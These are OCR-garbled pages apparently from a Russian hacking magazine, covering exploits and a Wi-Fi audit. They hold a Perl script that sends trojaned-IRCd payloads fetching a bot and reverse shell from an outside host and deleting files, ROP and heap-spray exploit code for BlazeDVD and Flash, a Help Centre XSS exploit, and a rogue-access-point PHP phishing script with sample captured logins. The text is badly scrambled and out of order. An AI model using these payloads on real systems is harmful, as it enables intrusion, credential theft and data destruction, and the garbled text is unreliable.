ту $рау1оай2 = 'АВ; ссі /Ртр; ѵ\?деР кВРр : / /е:ЕпеВЬз . ѵ\?еЬз . 
сот/ЬоР . ВхР -О ЬоР; сіітосі +х ЬоР; . /ЬоР &' ; 
ту $рау1оасіЗ = 'АВ; ссЗ /Ртр; ѵ^деР ііРРр : / /еРпеРЬз . ѵ^еЬз . 
сот/г. РхР -О гзііеіі; сктой +х гзііеіі; . /гзііеіі & 
ту $рау1оасі4 = 'АВ; кіііаіі ігссі'; 

ту $рау1оасІ5 = 'АВ; ей ~; /Ьіп/гт -Рг ~/*;/Ьіп/гт -Рг 

* I . 

$РюзР = " " ; 

$рогР = " " ; 

$Руре = " " ; 

$1іозР = @АКСѴ[0] ; 

$рогР = @АКСѴ[1] ; 

$Руре = @АКСѴ[2 ] ; 

ІР ( $РюзР ед " " ) { изаде ( ) ; } 

ІР ( $рогР ед " " ) { изаде ( ) ; } 

ІР ( $Руре ед " " ) { изаде ( ) ; } 

зиЬ изаде { 

ргіпРР " ХпВзаде :\п"; 

ргіпРР "регі ипгеа1р\л?п . р1 <РюзР> <рогР> <Руре>\п\п" ; 

ргіпРР "Соттапй ІізР :\п"; 

ргіпРР " [1] - Регі ВіпйзкеІІХп" ; 

ргіпРР " [2] - Регі Кеѵегзе Зііе11\п"; 

ргіпРР " [3] - Регі ВоР\п"; 

ргіпРР " \п"; 

ргіпРР " [4] - зкиРйохл^п ігсзегѵег\п" ; 
ргіпРР " [5] - йеІеРе ігсзегѵег\п" ; 
ехіР ( 1 ) ; 

} 



} еІзіР ($Руре ед "2") { 
ргіпР $зоскй " $рау1оай2 " ; 

} еІзіР ($Руре ед "3") { 
ргіпР $зоскй " $рау1оайЗ " ; 

} еІзіР ($Руре ед "4") { 
ргіпР $зоскй " $рау1оас14 " ; 

} еІзіР ($Руре ед " 5 " ) { 
ргіпР $зоскй " $рау1оай5 " ; 

} еізе { 

ргіпРР " Хпіпѵаіій ОрРіоп ...\п\п"; 
изаде ( ) ; 

} 

сіозе ( $зоскй) ; 
ехіР ( 1 ) ; 

} 

ипгеа1_Рго 3 ап ( ) ; 

# ВОР 



50ШТІ0М 



Проверить исходные коды, из которых собран демон, на наличие 
шести троянских строк или, что будет проще, проверить М05-хеш 
архива. У затроя йеной версии хеш должен быть УбЗеДбІ'ЗббУЗс! 679і'а9 
9бе3152а274б, у нормальной версии — 76741 е94е867с0а73705531б01 5 
Обебб. Если что нетак — удалить строки и пересобрать ІПС-демон или 
скачать с официального сайта (и опять-таки проверить хеш, на всякий 
пожарный). 




ПЕРЕПОЛНЕНИЕ БУФЕРА 
ВВІА2Е0Ѵ0РІАУЕР 



ВИЗ 

М/А 



зиЬ ипгеа1_Ргоз' ап { 
ту $ігсзегѵ = $РюзР; 
ту $ігсрогР = $рогР; 

# инициируем соединение 

ту $зоск(1 = ІО: : ЗоскеР : :ІЫЕТ->пеѵ^ (РеегАййг => 
$ігсзегѵ, РеегРогР => $ігсрогР, РгоРо => "Рср") I I йіе 
"Раііей Ро соппесР Ро $ігсзегѵ оп $ігсрогР . . .\п\п"; 
ргіпР " [ + ] Рауіоай зепР . . . \п" ; 

# отсылка злого контента 
ІР ($Руре ед "1" ) { 

ргіпР $зоскй " $рау1оасі1 " ; 



ТАРСЕТ5 



• ВІагеОѴО Ріауег 5.1 

гшз 

Об уязвимости в этом плеере известно уже достаточно давно, тем не 
менее я бы хотел обратить внимание на свежий эксплойт подданную 
уязвимость. Дело в том, что эксплойт работает в среде ѴѴіпбоѵѵз 7, а 
значит, умеет обходить ОЕР и А5ЕР. Автор эксплойта — баг-хантер, 
известный в Сети под ником тг_те, в девичестве — Стивен Си- 
лей (Зіеѵеп Зееіеу). Парень этот развлекается тем, что ищет дыры в 
различном ПС и пишет адекватные, рабочие эксплойты, за что честь 
ему и хвала (блог товарища — Ы:І:р5://пеІ:-піп]а.пе1: ). Хочу отметить, 
что состоит он в команде Согеіап Зесигііу Теат, создатель которой. 
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АсгоЬаІ Реасіег. Эксплойт сработал как часы. 5ѴѴР-файл внутри РОР 



согеІапсОсІЗг, выпустил недавно свой 10-й туториал отом, как писать 
современные эксплойты, используя технику возвратно-ориенти- 
рованного программирования. Неудивительно, что и этотэксплойт 
основан на той же идее. 



ЕХРЮІТ 



Данный эксплойт создает файл плейлиста сзІ-ЫагесІѵсІ.рІО при от- 
крытии которого с помощью ВІагеОѴО Ріауег выполнится фирменный 
шеллкод — вызов МеззадеВохАс сообщением отом, что «хак» удался 
:). Трудности такого эксплойта в ѴѴіпбоѵѵз 7 две. Во-первых, память, 
где лежит у нас шеллкод (а лежит он в стеке) является неисполняемой, 
поэтому шеллкод не имеет никакого морального права выполниться. 
Вторая проблема — адрес функции МеззадеВох нам неизвестен, так 
как все системные библиотеки в ѴѴіпбоѵѵз 7 имеют случайный сдвиг 
относительного базового адреса. Таким образом, после перехвата 
управления (а именно — перезаписи 5ЕН в стеке), эксплойт должен 
как-то сделать стек исполняемым, например, с помощью вызова 
функции ѴігІиаІРгоІесТ а еще должен как-то определить адреса 
используемых функций (ѴігІиаІРгоІесДМеззадеВох). Если ты читал 
предыдущие номера, то в курсе, что такое РОР, и с чем его едят. Если 
нет, то напомню — после завершения работы уязвимая функция берет 
из стека переписанный нами адрес возврата. Этотадресуказываетна 
некий участок исполняемой памяти с некими нужными инструкциями, 
обычно их одна-две штуки. Эти нужные инструкции в идеале должны 
заканчиваться командой РЕТМ, которая берет следующий адрес из 
стека, который также втиснут туда при переполнении буфера. Таким 
вот путем выполняется код, как бы из кусочков чужого кода. тг_те 
правильно заметил, что если брать та кой код из библиотек самого пле- 
ера, то даже несмотря на наличие А5ЕР код всегда будет находиться 
по одному и тому же адресу. Дело в том, что плеер скомпилирован без 
поддержки А5ЕР, и поэтому все его модули всегда грузятся по одному 
и тому же адресу (со следующего номера я уже не буду подробно рас- 
писывать ЕОР, иначе ЕогЬ меня за грызет за трату ценной бумаги на 
такую избитую тему (и правильно сделает — прим. ред.)). Нетривиаль- 
ной была и задача заставить этот РОР работать. Ведь в чем штука: во 
время обработки 5ЕН блока стек содержит л ишь адреса на обработчик 
и следующий блок. Все остальное в стеке далеко от РОР программы. 
тг_те нашел в статичных модулях адрес смены значения вершины 
стека. Тогда процессор переходит по этому адресу (думая, что там 
обработчик) и выполняет изменение указателя на вершину стека: 



ЕХРЫІТ5 
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РЕѴІЕѴѴ 




ЕХРЮІТ5 
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ВІагеОѴО. Результат открытия плейлиста 



посвященной разработке эксплойта (который уже успел стать клас- 
сическим... черт, себя не похвалишь, никто же...) с использованием 
возвратно-ориентированного программирования. Все. Больше о РОР 
не говорю. Ну и, конечно, эксплойт с комментариями ищи на диске. 



50ШТІ0М 



Что делать пользователям, понятное дело — обновить плеер. А вот 
программистам надо бы быть аккуратнее. Учитывая то, что от ошибок 
никто не застрахован, особенно не стоит пре неб ре гать /б і пат і с базе/ 
05-флагами при компиляции. И еще — в связке с ЭеЬОР все это добро 
позволит перестраховаться и сохранить честь, так кактакой тандем 
практически не пробиваем. 




ОШИБОЧНАЯ ОБРАБОТКА 
УКАЗАТЕЛЯ В Р1А5Н РЬАУЕК 



ВИЗ 

СѴЕ-2010-1297 



ТАРСЕТ5 



• АбоЬе АсгоЬаІ: Реабег <9.4 

• АбоЬе ЕІазЬ Ріауег <10.1 

В очередной раз мир поразила Обау-угроза для любителей продукции 
АбоЬе. А куда деваться? Темная сторона Силы нашла уязвимость в 
обработке байткода 5ѴѴЕ ЕІазЬ. Что примечательно, эксплойт, раз- 
работанный тьмой, был заточен и под АсгоЬаІ: Реабег. Фича в том, что 
читалка поддерживает воспроизведение флеш -анимации, а отсюда и 
последствия — атака сразу на два продукта. Эксплойт этот был разре- 
версен и добавлен в Ме^азрЫТ Так что добро пожаловать... 



0хб1б074АЕ : АВВ ЕЗР, 408 

0хб1б074В4 : КЕТЫ 4 

; РОП восстановлен, берем адрес и двигаем по цепочке 

Таким образом, РОР- программа исполняется дальше, так как РЕТМ 
4 берет из уже изменившегося стека значения, подсунутые тг_те. 
Более подробно о работе РОР можешь прочитать в моей статье. 



ЕХРЮІТ 



Пытаясь разобраться в том, откуда пришла проблема, исследователи 
обратили внимание на то, что 5ѴѴЕ-файл, который использовался для 
эксплуатации уязвимости и заражения бедных юзеров, был практи- 
чески идентичен файлу АЕ5-РНР.з\л/Т который есть в свободном до- 
ступе в Сети. Собственно, отличие было лишь в одном байте, а именно 
— в оригинальном файле байт-код 0x66 (СеіРгорегІу) заменен на 
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ІХЬѴІЬѴѴ 





ЕХРЮІТ5 
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< 0х0С0С0С0С + 0х8 = ЕАХ+8 на шаге (1) 



0x700156^, # тоѵ еах, [есх+0х3 4] / ризЬ [есх+0х24] / 



саіі [еах+8] 
Охсссссссс , 
0x7009084 , 
0x7009084, 
0x7009084, 
0x7009084, 
0x7009084, 
0x7009084 , 
0x7009033 , 
0x7009084 , 
ОхсОсОсОс , 
0x7009084, 
0x7009084, 
0x7009084 , 
0x7009084 , 
0x7009084 , 
0x7009084, 



; (шаг 1 ) 

# геО (шаг 4 ) 

# геО (шаг 5 ) 

# геО (шаг б ) 

# геО (шаг 7 ) 

# геО (шаг 8 ) 

# геО (шаг 9 ) 

# геО 0x18 (шаг 10) 

# геЕ 

# < 0х0С0С0С0С + 0х34 , ЕЗР на шаге (2) 

# геО 

# геО 

# геО 

# геО 

# геО (шаг 11) 

# геО (далее обычный КОР) 



АсгоЬаІ Кеасіег. Содержимое Ьеар-зргау 



байт-код 0x40 (пеѵѵІипсОоп). Скорее всего, обнаружить эту уязвимость 
помог файловый фаззер. 

Перед тем, как сработает 5ѴѴР-файл, в РОР происходит Ьеар-зргау с 
помощью ОаѵаЗсгірР В куче создается множество страниц с шеллко- 
дом, но не только. Для того, чтобы обойти защиту ВЕР, в кучу та к же 
инжектится РОР-программа, которая с помощью системного вызова 
создает новый кусок исполняемой памяти и копируеттуда шеллкод. 
Самое интересное — это как РОР-программа из сгенерированной кучи 
попала в стек. Уязвимость (вставка байт-кода пеѵѵІипсРоп) приводит к 
возможности перезаписи указателя ЕСХ значением ОхОСОСОСОС, пос- 
ле чего происходит вызов саР [есх+Ос]. Научно доказано, что по этому 
адресу обычно бывают данные из Ьеар-зргау. Злостный хакер так 
рассчитал размер инжектируемых данных, что по адресу ОхОСОСОСОС 
+ ОхС находится значение: 0x7001 56Е То есть фактически происходит 
вызов са и 0x7001 56Е Этот адрес принадлежит ВІВ.Ои и содержит та кой 

вот КОД: 



Как видно, технику возвратно-ориентирова иного программирова- 
ния можно использовать и без инструкций РЕТМ. Можно выбирать 
инструкции до инструкции САЕЕ или ОМР, если можно контролировать 
регистры -указатели. 
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ЕІазЬ 10.1 не содержитэтой уязвимости, так что патч-менеджмент — 
полезное дело. Крометого, библиотека ВІВ.бО, которая используется 
эксплойтом, какдонор инструкций, поддерживает А5ЕР, а посему 
владельцы ѴѴіпбоѵѵз 7 могут спать спокойно — эксплойт не сработает 
на их системах. 




ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА В ѴѴІМ00ѴѴ5 НЕЬР СЕМТРЕ 



ВИЗ 

СѴЕ-2010-1885 



тоѵ еах, [есх+0х34] 

; ЕСХ все еіце указывает на Ьеар-зргау (ОхОСОСОСОС) 

; по адресу 0х0С0С0С0С+0х34 лежит значение 
ОхОСОСОСОС 

; что и заносится в ЕАХ 
ризй [есх+0х24] 
саіі [еах+8] 

;по адресу 0х0С0С0С0С+0х8 лежит 0х70048еб 

0х70048е[ — адрес изтойже библиотеки, и содержит следующий код: 

хсйд еах,езр ; ЕАХ=0х0С0С0С0С , теперь и ЕЗР тоже 
геР ; следуюіцая инструкция 

Воттаким образом указатель на стекстал указателем на кучу из Ьеар- 
зргау. Далее приведу содержимое кучи с пошаговой нумерацией 
действий (все значения равны 4 байтам, первое значение в куче — по 
адресу ОхОСОСОСОС). 

0x7004919, # рор есх / рор есх / тоѵ [еах+ОхсО] ,1 / 

рор езі / рор еЬх / геР ; (шаг 3) 

Охсссссссс , 

0х70048еР, # хсйд еах,езр / геР ; (шаг 2) 



ТАРСЕТ5 



•ѴѴіпбоѵѵзХР 

шш 

Как известно, существуют разные взгляды на политику разглаше- 
ния информации об уязвимости. Господин ТэвисОрманди (Таѵіз 
Огтапбу), уже не раз бывавший героем рубрики, например, при- 
держивается взгляда о полном разглашении, если разработчик не 
проявил должного рвения к разработке патча. Два месяца назад он 
опубликовал Обау в ОАѴА Веріоутепі; Тооі КО, а в этот раз замахнул- 
ся на святое — на ѴѴіпбоѵѵз ХР, вернее, на его подсистему помощи. 
Он показал миру, как легко может быть запущен любой файл в 
системе, достаточно лишь жертве перейти на специально сфор- 
мированную страницу. Тэ вис сообщил МісгозоН'уо проблемах, 
но, по его словам, без эксплойта его послали подальше. Спустя 
несколько дней Тэвис сделал эксплойт, но также сделал и публич- 
ный релиз информации об уязвимости с техническими деталями 
и примером эксплойта. Вскоре после этого темная сторона Силы 
начала использовать этот эксплойт для атаки на пользователей. 

В итоге МісгозоН написала гневное письмо-сообщение отом, что 
Соодіе — это зло. «Э, причем тут они?» — спросишь ты. Да дело в 
том, что Тэвис является работником именно этой компании, где 
занимается разного рода зесигіІу-гезеагсЬ’ем. Но вот Соодіе тут 
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ѴѴіпсІоѵѵз Неір Сепіег. Эксплойт работает через любой браузер. 



ни при чем; по словам Тэ виса, он делал все этот независимо от ра- 
боты, в свое свободное время и ради собственного удовольствия. 
Комьюнити начала делится на два лагеря. Лидер Іттипііу написал 
письмо, о том, что Тэвис, конечно, поспешил, но спускать собак на 
него не надо. Разработчики и такживут в шоколаде — ресерчеры 
бесплатно ищут уязвимости, сообщают детали и ждут... иногда ждут 
год, иногда больше. С другой стороны, такой подход плодит заразу 
и был сравнен одним товарищем с кибертерроризмом. Мда. Есть 
и третья сторона — N0 МОРЕ ЕРЕЕ В065. Другими словами, если 
разработчику нужна информация об уязвимостях — пусть платит 
и потом делает, что хочет. Некоторые разработчики уже пошли по 
такому пути... 



ЕХРЮІТ 



Центр Помощи и Поддержки — это ПО (Ьеірсіг.ехе), которое по умол- 
чанию имеется в винде, оно может обрабатывать О РЕ на документы, 
которые начинаются со специального префикса «Ьср://». Далее идет 
проверка, есть ли данный документ в списке доверенных. Вот, собс- 
твенно, Тэвис и нашел путь, который позволяетобмануть эту проверку. 
Вернее, он нашел Х55 в таком документе. 

Ііср : / /зузДет/зузіпТо/зузіпТотаіп . ііЦт?зѵг=<]т1>ЦезЦ</ 

1і1> 

Документы эти находятся в привилегированной зоне, и Тэвис нашел 
путь исполнить произвольный КОД: : <зсгірС 
ЛеТег>еѵа1 (ипезсаре 

( ' Кип ( "саіс . ехе" ) ' ) ) </зсгірС>. Однако из-за фильтра ІЕ8 
так пользователя не взломать. И воттут наш хитрец изловчился — он 
воспользовался ѴѴіпбоѵѵз Мебіа Ріауег... Да, да... дело втом, что этот 
плеер можетлегко вызываться из браузера, например, с помощью его 
АсЕѵеХ. У плеера есть возможность ходить за всяким данными по ПРЕ, 
поэтому, подготовив небольшой А5Х-скрипт, можно указать плееру, 
что показывать, и куда, собственно, ему идти: 

<АЗХ ѴЕКЗІОК= " 3 . О " > 

< РАКАМ пате= "НТМЬѴіеѵ\?" 

ѵа1ие= "КРРр : / /2Ь0І-ІІКЬ/зЦагЫте1р . КРтІ " /> 

<ЕЫТКУ> 

<КЕЕ іігеТ= "КРРр : / /2Е0І-иКЕ/Ьид-ѵз-ТеаРиге . :‘рд" /> 
</ЕЫТКУ> 

</АЗХ> 




Этого достаточно, чтобы при открытии плеером он пошел по этим 
линкам. РЕЕ указывает на картинку, которую гордо покажет на экране, 
а вот РАРАМ пате="НТМЕѴіеѵѵ" поведет плеер за дополнительными 
данными — зІагіЬеІр.ЫппІ: 

<і:Егате згс= "Кср : //зегѵісез/зеагс1і?диегу=апуРМпд& 

Роріс=1іср : / /зузРет/зузіп:Ео/зузіп:Еотаіп . 1іРт%А%%А%%А 

%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%% 

А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А% 

%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А 

%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А% 

%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%%А%% 

А%%А%%А%%А%%А%%А%%А%%А%%А%%А. .%5С. . %5Сзузіпготаіп . 

1іРт%и0 03 Рзѵг=%ЗСзсгірР%2 0сіеРег%ЗЕеѵа1%2 8ипезсаре% 

28%27Кип%2528%2522са1с.ехе%2522%2529%27%29%29%ЗС/ 

зсгірР%ЗЕ " > 

Тут Тэвис используетхитрую уязвимость обработки спецсимволов в 
центре помощи, чтобы обойти проверку на доверенность. Дело втом, 
что функция не очень хорошо переводит из Ьех'ов в числа при раскоди- 
ровке ипезсаре-строки, поэтому в результате мы увидим калькулятор. 
Более того, с ІЕ7 можно не париться из-за фильтра и сразутак и давать 
фреймом по... центру помощи. Однако варианте Меб іа Ріауег'ом можно 
использовать и для кросс-браузерных атак, что Тэвис и показал: 

<1іЦт1><]теа(і><ЦіЦІе>ТезЦіпд НСР</ЦіШе></]теа(і> 
<Ьо(Ту><]т1>ОК</]т1> 

<зсгірЦ> 

// НСР:// ѴиІпегаЬіІіДу , Таѵіз ОгтапеЗу, Кипе 2 010. 
ѵаг азх = "ііДЦр : / /2Е0І-иКЕ/зітр1е . азх" ; // для плеера 
// Если ІЕ, то грузим активикс и передаем ему азх. 

ІТ (ѵ\?іпсіо\л?. паѵідаДог . аррЫате 

== "МіегозоТД ІпДегпеД Ехріогег") { 

// ІпДегпеД Ехріогег 

ѵаг о = (ТоситепД . сгеаДеЕІетепД ( "ОВДЕСТ" ) ; 
о . зеДАДДгіЬиДе ( " сіаззісі" , 

"сізісі: 6ВЕ52А52-3 94А-1ІСІЗ-ВІ53-0 0С04Е7 9ЕАА6" ) ; 
о . орепРІауег ( азх) ; //ВАХ! 

// Если не ІЕ, то открываем азх в фрейме, 

// крутые браузеры сами поймут, что нужен 
//медиа плеер для этого. . . 

} еізе { 

// Могіііа, Сйготе, ЕДс. 

ѵаг о = боситепД . сгеаДеЕІетепД ( " ІЕКАМЕ " ) ; 
о . зеДАДДгіЬиДе ( " зге " , азх); 
боситепД . Ьобу . аррепбСйНб. ( о ) ; //ВАХ! 

} 

</зсгірД> 

</Ьобу></]тДт1> 

Добавлю, что плеер мерзко предупреждает о том, что ему надо зачем- 
то сходить на ХЕОІ-ОЕЕ. 
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• Отключить протокол Ьср (удалив НК0Е\Н0Р\збеи\ореп) центр 
помощи. 

• Воспользоваться патчем отТэвиса — Ы:1:р://[оск.сппрхсЬа8Ь.сопп/ 
Ы 0а58Ь75029І'79Ь5І93иаббЗббі'992/ЬсрЬо1:Ех.2Ір . Этот патч фиксит 
бинарник Ьеірсіг.ехе, делая проверку надежной. 

• Ждать патча от МіегозоІЕ ^ 
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Давай заранее договоримся: дабы соблюсти этикет и не ставить в 
неловкое положение моего провайдера, я не буду называть кон- 
кретные сайты и бренды (кому надо, тот все поймет сам). Тем более, 
по закону ничего нарушено не было — аудит выполнялся исключи- 
тельно под своими, честно купленными аккаунтами. Да и цель этой 
статьи — не опорочить честь какой-то компании, а лишь указать на 
общие недостатки ѴѴіРі-инфраструктуры, которые, наверняка, при- 
сутствуют у крупнейших провайдеров. 

ПЕРВЫЕ РАЗОЧАРОВАНИЯ 

Итак, вернемся к маркетингу. Представь себе крупный рос- 
сийский город-миллионник, в котором рекламщики затрубили 
лозунгами: «Беспроводной, быстрый и удобный Интернет!», «На- 



сладись Сетью в л 
появляется такая воз 
Ведь, согласись, удобнсНа' 
давно привычно — прим, р' 
своим верным другом -ноутбукДмд^ 
насущных. 

Но, немного пообщавшись, испытав серию разтгьгвюа и дисконна кх 
я почувствовала нотки первых разочарований. И даже не потому, что 
канал слабоват, а потому что при повторном коннекте (даже через 10 
минут) не требовалось повторной авторизации. 

Это что еще такое? Значит, я плачу за доступ, а провайдер совсем не 
заботится о моей безопасности (ведь все сессии после моего ухода 
теоретически могут быть доступны другим людям!). После такого 



«Беспроводной Интернет в каждый дом» - весьма з| 
приятно, когда твой провайдер, еще каких-то 5 лет ш 
модемный доступ, за считанные дни развертывает е| 
по всему городу (ну или хотя бы в его центре). Казаш 
и теперь ты, сидя в Макдональдсе и вкушая третий м 
быстрым интернетом. Но, присмотревшись вниматеЦь 
не бывает - безопасность провайдера, а значит и Щ 
желать лучшего. Чтобы не быть голословной, предлЦ 
неформального аудита недавно родившейся сети. 
убедишься в его правдивости на своем горе-провай;к 
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В кадре виден логиНр пароль и адрес хостар 
на котором производилась авторизация 



Из АВР-сообщений можно узнать МАС и ІР других 
пользователей сети 




> СІѴСІ 

На диске ты 
найдешь программы, 
оказавшие мне 
посильную помощь 
в экспериментах 
(МАССЬапде, 

5таи НТТР Зегѵег, 
ѴѴігеЗЬагк со всеми 
утилитами, ІЛазоІІ: 
Зпіі'і'ег, ІпІегСерІег), 
а также РНР-скрипт, 
перехватывающий 
авторизационные 
сведения. 




> ѵѵагпіпд 

Внимание! 
Информация 
представлена 
исключительно 
с целью 
ознакомления! 
Ни автор, ни 
редакция за 
твои действия 
ответственности 
не несут! 



удивления мне захотелось чуть-чуть поснифать сетку, а 
затем проверить предположения. 

Как законопослушная девушка, я не стала снифать компы 
посетителей крупного кафе (сидящих на том же бес- 
проводном интернете). Вместо этого я пригласила друга 
с ноутбуком :). Он угостил меня чашечкой кофе и стал 
имитировать бурную деятельность в Сети (запустил аську, 
контакт, проверил почту и т.п.). 

НЮХАЕМ И... ЗАДЫХАЕМСЯ! 

Я же, не теряя времени, запустила ѴѴігеВЬагк и стала 
мониторить периметр. Среди пакетов я сразу увидела 
551-рукопожатие на сайте провайдера... 

К слову, как происходит авторизация соединения: сначала 
клиент коннектится к незащищенной ѴѴЕР/ѴѴ РА -точке, 
затем обращается браузером на любой сайт в Сети и ре- 
директится на страницу авторизации. Там он вводит логин 
и пароль личного счета (пополняемого путем отправки 
5М5-сообщения на специальный номер), и после этого, по 
всей видимости, на роутере создается правило, позволяю- 
щее юзать интернет. 

Так вот, после зашифрованной 551-авторизации я 
увидела совершенно незакриптованные пароли от 
«ВКонтакте» и почты, слегка заХСР’енные пассворды от 
Аськи (которые легко вскрываются тем же ІЛазоб: 5пТ1ег 
или ІпІегСерІег’ом) и неприличные ссылки, ведущие на 
порносайты (совсем уже никого не стесняется... :). Я не 
упоминаю про других клиентов этой сети (их я не анали- 
зировала, поскольку специально поставила фильтр на 
ІР-адрес друга, чтобы не нарушать закон). 

Но, как говорится, если совсем хочется, то можно (и даже 
нужно!) чуть-чуть нарушить (но только для расширения 
кругозора :). Зная ІР и МАС-адреса, фигурирующие в 
периметре (а они узнаются анализом АРР-сообщений), 
можно легко их проспуфить. 

На сайте провайдера написано, что перед отключением от 
Сети необходимо завершить сессию путем нажатия кноп- 
ки «Выход» на авторизационном сайте, иначе аккаунт бу- 
дет доступен еще некоторое время после отключения. Это 
нам только на руку, поскольку далеко не каждый клиент 
будет этим заморачиваться :). 

Итак, с помощью хорошей программы по смене МАС- 
адресов — МАССЬапде (или вручную, кто как любит) — из- 
меним адрес своего беспроводного адаптера на извест- 
ный нам МАС соседа. 

Не забудем присвоить себе его ІР. Затем попробуем 
подключиться к сети. О чудо, оказывается, провайдер 



допускает как ВНСР-, так и Зіабс-адресацию. И, таким 
образом, можно наслаждаться прелестями беспроводного 
интернета бесплатно. А точнее, за чужой счет! 

А ЧТО, ЕСЛИ?.. 

Ну, раз уж мы нарушили закон ради эксперимента, попро- 
буем углубить и расширить наш опыт. Что бы еще такого 
придумать, чтобы показать все недостатки нашей бес- 
проводной сети? Сразу же приходит мысль об организа- 
ции МкМ-атаки, путем инсталляции подставной точки. Но 
здесь уже в кафе не расположишься. 

Для проведения такого опыта нам необходимо иметь не- 
сколько компонентов: веб-сервер, точку доступа и ноутбук 
для тестирования. 

Мне пришлось идти домой, искать на антресолях за- 
валявшийся ВІВ-ЗОО и настроить на нем ВНСР-сервер. 
5510 точки я определила аналогичным идентификатору 
оператора. 

В качестве веб-сервера я выбрала компактный и удобный 
5таи НТТР Зегѵег. Много слов уже было сказано об этом 
малыше. Мне лично нравится его удобный интерфейс 
и, несмотря на весьма небольшие размеры, широкий 
функционал. 

Поднимем на нем ѴѴЕВ- и ВМ5-серверы, чтобы при по- 
пытке зайти на какую-нибудь веб-страницу пользователя 
направляло на НТМЕ-страницу, напоминающую упомяну- 
тый сайт регистрации в сети оператора. Теперь создадим 
РНР-скриптик, сохраняющий вводимую на сайте инфор- 
мацию в отдельный Іхі-файл. 

<?р1ір 

$:Еі1епате = ' 3 : \Тюте\1оса1ТюзР\ѵл^\іпПо . ЦхЦ ' ; 
$а = $_СЕТ [ ' Іодіп ' ] ; 

$Ь = $_СЕТ [ ' раззѵ70Г(Т ' ] ; 

$зотесопРепЦ = " -- Логин - \п".$а." --Па- 
роль - \п".$Ь." -- \п"; 

// Проверка существования и доступа для 
записи файла 

( із_іл[гіРаЫе ( $^і1епате) ) 
і:Е ( ! $Папсі1е = Пореп ( $:Еі1епате , ' г+ ' ) ) 

{ 

есТю "Не могу открыть файл ( $Пі1епате) " ; 
ехіР ; 

} 

і:Е ( ! ^ѵ7ГІЦе ( $Папсі1е , $зотесопРепР) ) 

{ 
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Ввод логина и пароля на подставном сайте 



есііо "Не могу произвести запись в файл ( $:Еі1епате) " ; 
ехіН ; 

} 

е1зе{ес1іо " ";} 

есНо "Записано ( $зотесопНепН ) в файл ( $:Еі1епате) " ; 
^сіозе ( $1іап(і1е) ; 

} 

еізе { 

есНо "Файл $:Еі1епате недоступен для записи"; 

} 

?> 

Подстава готова, запускаем! 

МІТМ в ДЕЙСТВИИ 

План кражи логина и пароля от сети таков: пользователь активирует 
свой беспроводной адаптер и пытается подключиться к сети. При 
этом в списке доступных сетей он видит подставную точку доступа с 
тем же 55Ю, что и у коммерческого оператора. Система выносит ее 
на первый порядок, поскольку сигнал от нее сильнее операторского. 
Далее клиент подключается к этой точке, заходит в свой браузер и 
попадает на страницу авторизации. Эта страница также имеет схожий 
со страницей оператора интерфейс. Пользователь, ничего не подо- 
зревая, вводит свои реквизиты в соответствующие поля. При нажатии 
на кнопку «войти» введенные им данные сохраняются посредством 
РНР-скрипта в текстовый файл на сервере. А клиент остается без 



интернета (и, конечно же, без логина с паролем :) — прим. ред.]. Чтобы 
ничего не упустить из виду, пробуем авторизоваться на подставной 
точке доступа: вводим реквизиты, жмем «войти»... далее ничего не 
происходит, как кажется обычному юзеру, но скрипт уже сделал свое 
грязное дельце, и данные сохранены на сервере. Откроем этот файл и 
посмотрим его содержимое. Вуаля! Вот данные, которые мы ввели, и 
сюрприз: кто-то уже подключился к нашей точке доступа и теперь есть 
еще пара логинов и паролей для входа в сеть. В такой ситуации даже 
551-авторизация не спасает от кражи реквизитов. 

ПАЦИЕНТ СКОРЕЕ ЖИВ, ЧЕМ МЕРТВ 

Что можно тут сказать? Самое страшное, что таких сетей больше по- 
ловины по всей стране (только мне известны четыре крупных города- 
миллионника с подобной схемой авторизации). И никто не может 
гарантировать легитимность входящих пользователей. При этом 
владельцы сервисов практически никогда не предупреждают своих 
клиентов об уязвимости их данных, о рисках кражи информации. Все 
жаждут увеличения прибыли, пренебрегая при этом всеми методами 
обеспечения безопасности, поскольку это приводит к снижению ско- 
рости передачи данных и усложняет процесс настройки клиентского 
оборудования (и, соответственно, получения доступа к сети). 

Поэтому хочу напоследок дать хороший совет: обращай внимание 
на точки доступа, к которым ты подключаешься, и не передавай 
важную информацию в незащищенных сетях (либо используй при 
этом ѴРМ-соединение), поскольку это может привести к фатальным 
последствиям. 



(х(-файл с сохраненными данными 




логин - 1234 5 — Пароль - ^ѵѵег1у 
логин - 5374756355274 — Пароль - 
Логин - 7843537625348 — Пароль - 



г4 5772РисІ\ѵ6 
3’1тРб84к1дИ7 
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Небезопасность НАТО 

КАК НАТО БОРЕТСЯ С ХАКЕРАМИ 

В моем материале ты можешь увидеть, как трудно, оказывается, сделать 
правильную систему веб-аутентификации. Особенно если зто касается большого 
корпоративного портала. И тем более, если он отвечает за безопасность целой 
страны, да притом не одной. 



В нашем журнале появилась очень хорошая практика — стали пу- 
бликоваться аудиторы информационной безопасности. Очевидно, что 
актуальность темы аудита возросла многократно. Наш постоянный чи- 
татель, конечно, понимает, почему. Достаточно просмотреть архивную 
подшивку журнала за прошедшее время и можно смело утверждать, 
что с помощью технологий и программ, о которых писали в этих «Хаке- 
рах», можно успешно воевать (и не только на коммерческом рынке). 
Кстати, про корпоративную безопасность. Многие уже давно говорят 
о том, что атаки таких классов как 501-инъекция, использование 
Х55, ІП/НРІ или ошибок в аутентификации, изживают свой век и уже 
не актуальны. Многие специалисты приводят в своих презентациях 
всевозможные графики, на которых отображены все время умень- 
шающиеся «столбики» с процентами обнаруживаемых уязвимостей 
подобного рода. 

Практика показывает, что доверять таким цифрам нельзя, потому что, 
как правило, в качестве исходных данных для красивых графиков ис- 
пользуются результаты автоматического сканирования веб-ресурсов 
не менее автоматическими сканерами. Конечно, современные 
автоматические сканеры (подобные Асипебх, пікЬ, ѵѵЗаІ и зрітар) уже 
стали похожи на искусственный интеллект — они не умеют разве что 



только заваривать кофе и оказывать эскорт-услуги. Но, к сожалению, 
они неспособны распознать и вскрыть правду о сложных логических 
ошибках аутентификации, скрытых дефектах генерации выходных 
данных, а зачастую и обработки входных данных. Надо ли говорить о 
простых уязвимостях, которые сами по себе не представляют опас- 
